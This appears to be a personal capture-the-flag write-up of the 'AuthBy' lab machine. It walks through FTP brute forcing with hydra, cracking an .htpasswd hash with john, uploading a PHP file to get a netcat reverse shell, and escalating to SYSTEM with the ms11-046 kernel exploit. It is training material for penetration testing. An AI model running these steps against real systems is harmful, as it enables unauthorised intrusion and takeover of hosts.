Machine Information
- Machine Name: AuthBy
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
Nmap scan report for 192.168.206.46
Host is up, received user-set (0.017s latency).
Scanned at 2024-10-07 16:27:37 +08 for 122s
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
| ---------- 1 root root 25 Feb 10 2011 UninstallService.bat
| ---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
| ---------- 1 root root 17 Aug 13 2011 StopService.bat
| ---------- 1 root root 18 Aug 13 2011 StartService.bat
| ---------- 1 root root 8736 Nov 09 2011 Settings.ini
| dr-xr-xr-x 1 root root 512 Oct 07 15:27 log
| ---------- 1 root root 2275 Aug 08 2011 LICENSE.htm
| ---------- 1 root root 23 Feb 10 2011 InstallService.bat
| dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
| dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
|_dr-xr-xr-x 1 root root 512 Aug 03 20:17 accounts
242/tcp open http syn-ack ttl 125 Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
|_http-title: 401 Authorization Required
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-auth:
| HTTP/1.1 401 Authorization Required\x0D
|_ Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
3145/tcp open zftp-admin syn-ack ttl 125 zFTPServer admin
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 125
| rdp-ntlm-info:
| Target_Name: LIVDA
| NetBIOS_Domain_Name: LIVDA
| NetBIOS_Computer_Name: LIVDA
| DNS_Domain_Name: LIVDA
| DNS_Computer_Name: LIVDA
| Product_Version: 6.0.6001
|_ System_Time: 2024-10-07T08:29:33+00:00
|_ssl-date: 2024-10-07T08:29:38+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=LIVDA
| Issuer: commonName=LIVDA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-08-02T13:17:54
| Not valid after: 2025-02-01T13:17:54
| MD5: 650f:e7dd:0507:c634:18f8:aed5:f63e:fd7c
| SHA-1: 0d17:0b40:5f95:dd6b:6e26:b109:6cde:370d:ac4b:05d0
| -----BEGIN CERTIFICATE-----
| MIICzjCCAbagAwIBAgIQEtJ0jB+SdaVA6j3KCjdz+jANBgkqhkiG9w0BAQUFADAQ
| MQ4wDAYDVQQDEwVMSVZEQTAeFw0yNDA4MDIxMzE3NTRaFw0yNTAyMDExMzE3NTRa
| MBAxDjAMBgNVBAMTBUxJVkRBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
| AQEAxfv25ZhCth01oRvmJJnYxJOVcGkTURSnx8nXhjVVsMfj+TrNvtCjyysyaahW
| CTokqtS7DMnY9sVOC/kufc7Jc1SNOa1Mh5CUJtLS5m7hGaAKcTXDLCq5RqcYdvBu
| f1r3m1D/mJVxuxb+bdV1R403Rrzpb5c0GW2OcAhwUKXk5PCSVE2VHiqxpfN5TWr0
| xB7YlspAPEApkbWpBxrOTtkIStVNMBNqzjm25ppdCZAcHe4mdMNIx6u0IHMXEYxU
| TXlou8WFhilm7hqmvmSMPuJfNDs477zbZIpzWv3RXCw1OSescliy8EFJTQe1zWms
| XbgMq/a5wP9LPNCtDNLq7QxOVwIDAQABoyQwIjATBgNVHSUEDDAKBggrBgEFBQcD
| ATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQEFBQADggEBAMEvrZlOYUvSTJj0wrxE
| vM+xBMTTng/UfmtrGIXzyhJLnZUvSoJ5st8JrWq3AuGg5n3zRgggtbEqQc9pFsxO
| 3bYmvKG+alJIYxqSYBkUCAnmMLp5CxpbC2a2jCSGtpeS5f0yXir0uCzs3gHbo8N7
| eyfkdEpfa8mHpCWPcep7uT+hLEAdqO+OzrLZ9nY8i1UXxuoOvtPRi41bs8lcqR2N
| fD5tO+9W7KjZTKLXZ6/jFys5pbH8/PWO5fshi8/YuGPR1cRXh/yUa+cq5s+vubwZ
| soDMcrwVPiDwAO5z6+n/sgnD8/8sCcOy/zc69+aOZ1XTcNADqqMnSSHVeObPO7/K
| eQU=
|_-----END CERTIFICATE-----
There’s 2 unusual port which is 242 and 3145. Port 21 shows that I could login as anonymous. Lets see whats useful inside.
Port 21
Lets try to replicate the anonymous login first
1
2
3
4
5
6
7
8
9
10
11
ftp 192.168.206.46
Connected to 192.168.206.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.206.46:root): Anonymous
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
After exploring around, I noticed that I could not even read or write in any directories and files. The only thing I could do is just listing out the available directories and files. The only interesting information I found is some potential username.
1
2
3
4
5
6
7
8
9
10
11
ftp> cd accounts
250 CWD Command successful.
ftp> dir
229 Entering Extended Passive Mode (|||2050|)
150 Opening connection for /bin/ls.
total 4
dr-xr-xr-x 1 root root 512 Aug 03 20:17 backup
---------- 1 root root 764 Aug 03 20:17 acc[Offsec].uac
---------- 1 root root 1030 Aug 03 20:17 acc[anonymous].uac
---------- 1 root root 926 Aug 03 20:17 acc[admin].uac
Since there’s not much I could do, the next thing I tried is to login in FTP using the potential username.
1
2
3
4
5
6
7
8
9
10
11
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.206.46 -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-07 21:00:01
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://192.168.206.46:21/
[STATUS] 4197.00 tries/min, 4197 tries in 00:01h, 14340202 to do in 56:57h, 64 active
[STATUS] 4222.33 tries/min, 12667 tries in 00:03h, 14331732 to do in 56:35h, 64 active
[21][ftp] host: 192.168.206.46 login: admin password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-07 21:04:46
After brute forcing with common password, it has a result and the credential is admin:admin. Then it’s time to login into FTP again.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
ftp 192.168.206.46
Connected to 192.168.206.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.206.46:root): admin
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||2051|)
150 Opening connection for /bin/ls.
total 3
-r--r--r-- 1 root root 76 Nov 08 2011 index.php
-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd
-r--r--r-- 1 root root 161 Nov 08 2011 .htaccess
226 Closing data connection.
It seems like I have access to different files and both read / write files works. Looks like I could just upload my vulnerable php file and execute it in the website. But before uploading, lets go through all the files.
1
2
3
4
5
6
7
8
9
10
cat .htaccess
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>
cat .htpasswd
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
It seems like there’s a password protected for the website and the hash it provided. Time to crack it using john ~
1
2
3
4
5
6
7
8
9
10
11
john -w=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
elite (offsec)
1g 0:00:00:00 DONE (2024-10-07 21:15) 3.333g/s 84160p/s 84160c/s 84160C/s lovestruck..cutegal
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Ok, now that I have the password, lets upload a vulnerable php file before moving to web port.
1
2
3
4
5
6
7
ftp> put vuln.php
local: vuln.php remote: vuln.php
229 Entering Extended Passive Mode (|||2056|)
150 File status okay; about to open data connection.
100% |***********************************************************************************************************************************************************************************************| 29 88.22 KiB/s 00:00 ETA
226 Closing data connection.
29 bytes sent in 00:00 (0.45 KiB/s)
Alright, for web port, it’s using port 242 according to nmap result.
Port 242
It is asking for credential, time to use the one cracked using john. It works and I managed to access the website after providing the correct credential. Since everything is exactly according to the FTP, I tried navigating to my vulnerable php file and it works.
Time to get reverse shell by uploading nc.exe.
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.191] from (UNKNOWN) [192.168.206.46] 49157
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\wamp\www>whoami
whoami
livda\apache
Since I’m not high privilege user, time to privilege escalation.
Privilege Escalation
Always use winpeas for useful information (somehow, winpeas does not work here. I guess it required older winpeas or different bit). I checked my current user privileges, it seems like I has SeImpersonatePrivilege which I could use potato attacks to get high privilege user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
C:\wamp\www>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
============ =============================================
livda\apache S-1-5-21-1204100616-2260006253-652133421-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Unknown SID type S-1-16-12288 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Time to use printspoofer and godpotato to see if it works. Sadly, none of it works. I then look into the system information for more info.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
C:\Users\Public>systeminfo
systeminfo
Host Name: LIVDA
OS Name: Microsoftr Windows Serverr 2008 Standard
OS Version: 6.0.6001 Service Pack 1 Build 6001
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 92573-OEM-7502905-27565
Original Install Date: 12/19/2009, 11:25:57 AM
System Boot Time: 10/7/2024, 5:39:48 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2650 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,644 MB
Page File: Max Size: 1,985 MB
Page File: Available: 1,547 MB
Page File: In Use: 438 MB
Page File Location(s): N/A
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): N/A
It seems like it’s a Microsoftr Windows Serverr 2008 Standard OS. Time to google for privilege escalation using the OS name provided. After googling around, I found a exploit that looks promising. Time to explore and see how it works. Alright, I have no idea how to compile it but I managed to find an alternative https://github.com/SecWiki/windows-kernel-exploits. This has tons of compiled exploit which include the one that I need. Time to try it by uploading it using FTP and execute it.
1
2
3
4
5
6
7
C:\wamp\www>.\ms11-046.exe
.\ms11-046.exe
c:\Windows\System32>whoami
whoami
nt authority\system
It works ~
Things I learned from this machine
- FTP might be using weak credentials
- the htaccess and htpasswd thingy to setup a simple authentication
- literally searching for kernel exploit for privilege escalation